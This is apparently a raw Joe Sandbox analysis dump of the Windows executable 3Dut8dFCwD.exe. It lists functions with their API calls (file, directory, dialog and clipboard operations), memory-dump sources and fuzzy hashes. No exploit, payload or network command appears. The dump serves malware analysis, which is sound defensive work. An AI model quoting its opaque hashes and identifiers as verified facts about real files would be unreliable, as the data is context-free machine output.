Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction ID: 5e01d24d9a9add2734d853181832f52676860c459c8436f1574cfa514314cc42
Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction Fuzzy Hash: 34E0653111DB9556E3206B359E0CA6B29D8DF86724F05093EF491B21D0DB78484A8AAD

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D

Function 00405A88 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA
GetLastError.KERNEL32 ref: 00405AD8

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: a317670bc0344c02bc4a283170babb3afb7c1cf0ece08f5f419864d791fc675b
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 6CF0F4B0D0064EDADB00DFA4C6487EFBBB4EB04309F10812AD941B6281D7B882488FA9

Function 00406928 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
GetProcAddress.KERNEL32(00000000,?), ref: 00406955

Part of subcall function 004068B8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
Part of subcall function 004068B8: wsprintfW.USER32 ref: 0040690A
Part of subcall function 004068B8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 3558e7e07fc8bc3cb8e2ee1445b58ac947b9e1d3522fe80aecf0cccf78f5b58a
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: C7E08673504211ABD2106A705E04C2777AD9F85750302443EF946F2140D774DC32A76D

Function 00406024 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00406028
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00405FFF Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: b044de85d095277e3e8e37393dee7a1aab5cccde4b3e14dcc7f467a135196144
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: C7D0C972505220AFC2103B28EE0889BBB55DB54271B028A35FCA9A22B0CB304C669A94

Function 00403B2C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403A5F,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B37

Strings

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\, xrefs: 00403B4B

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\
API String ID: 2962429428-3461479535
Opcode ID: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
Instruction ID: 56a8d231df6e1f4919b80352f74fca15e45824bb5242f2e67795a820b0309f86
Opcode Fuzzy Hash: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
Instruction Fuzzy Hash: C9C0123054470496D5247F799D4FE453A249740739B908325B2B9B40F2C73C5659596D

Function 00405AE2 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AF6

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 7753466ba62b5dbc1ec3a25bc90d7dba0bbd887294648da7d021985784af3e89
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 9FC04C70308906DAD6505B619F4871B7950AB50741F154939A986E50E0DA748495EE2D

Function 004060D6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040347A,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060EA

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: b33f9baa58445403e377b25cdb553cbb5220209f8a97e81f67fdd09438c35695
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 80E08C3225021ABBDF109F54CC00EEB3B6CEB043A0F018437F916E2060D670E930A7A8

Function 004060A7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034C4,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060BB

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: 39ae2bf48dd7ef05cc95990c5189398c44bf694af0d2be0d7958e68ccb6b0415
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 54E08C3226126AABCF10DF508C00EEB3BACEF043A0F014432F912E3080DA30E92197A9

Function 004062F4 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE

Part of subcall function 0040617A: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE
Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
Part of subcall function 0040617A: wsprintfA.USER32 ref: 004061F9
Part of subcall function 0040617A: GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
Part of subcall function 0040617A: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
Part of subcall function 0040617A: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
Part of subcall function 0040617A: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
String ID:
API String ID: 1930046112-0
Opcode ID: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
Instruction ID: 441f6a94ec63c8a803b4d3fb3af655611ae8c98ae086b365179572a1c2ea722f
Opcode Fuzzy Hash: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
Instruction Fuzzy Hash: 03D09E32108601AEDA511B50DD05A1B7FB1BF94355F11C42EF585540B1DB358861DF09

Function 004034C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034D5

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Non-executed Functions

Function 004056F8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405756
GetDlgItem.USER32(?,000003EE), ref: 00405765
GetClientRect.USER32(?,?), ref: 004057A2
GetSystemMetrics.USER32(00000002), ref: 004057A9
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057CA
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057DB
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057EE
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057FC
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040580F
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405831
ShowWindow.USER32(?,00000008), ref: 00405845
GetDlgItem.USER32(?,000003EC), ref: 00405866
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405876
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040588F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040589B
GetDlgItem.USER32(?,000003F8), ref: 00405774

Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6

GetDlgItem.USER32(?,000003EC), ref: 004058B8
CreateThread.KERNEL32(00000000,00000000,Function_0000568C,00000000), ref: 004058C6
CloseHandle.KERNEL32(00000000), ref: 004058CD
ShowWindow.USER32(00000000), ref: 004058F1
ShowWindow.USER32(?,00000008), ref: 004058F6
ShowWindow.USER32(00000008), ref: 00405940
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405974
CreatePopupMenu.USER32 ref: 00405985
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405999
GetWindowRect.USER32(?,?), ref: 004059B9
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059D2
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0A
OpenClipboard.USER32(00000000), ref: 00405A1A
EmptyClipboard.USER32 ref: 00405A20
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A2C
GlobalLock.KERNEL32(00000000), ref: 00405A36
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4A
GlobalUnlock.KERNEL32(00000000), ref: 00405A6A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A75
CloseClipboard.USER32 ref: 00405A7B

Strings

{, xrefs: 0040595E

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 17f82a3091fa66928221ea1c6b9dda913e53b80d5dd41b689f6bd494f538d155
Instruction ID: bada4f766a7f909e2fcc31d20e9d53a26b7aeb91fc87c8d9c8de415280c65713
Opcode Fuzzy Hash: 17f82a3091fa66928221ea1c6b9dda913e53b80d5dd41b689f6bd494f538d155
Instruction Fuzzy Hash: 4DB14AB1900608FFDF11AF61DD85AAE7B79FB48354F00813AFA41B61A0CB784A51DF68

Function 004049A4 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049F3
SetWindowTextW.USER32(00000000,?), ref: 00404A1D
SHBrowseForFolderW.SHELL32(?), ref: 00404ACE
CoTaskMemFree.OLE32(00000000), ref: 00404AD9
lstrcmpiW.KERNEL32(007A6200,007A1748,00000000,?,?), ref: 00404B0B
lstrcatW.KERNEL32(?,007A6200), ref: 00404B17
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B29

Part of subcall function 00405B78: GetDlgItemTextW.USER32(?,?,00000400,00404B60), ref: 00405B8B

Part of subcall function 004067E2: CharNextW.USER32(?,*?|<>/":,00000000,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
Part of subcall function 004067E2: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
Part of subcall function 004067E2: CharNextW.USER32(?,007B3000,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
Part of subcall function 004067E2: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C

GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404BEC
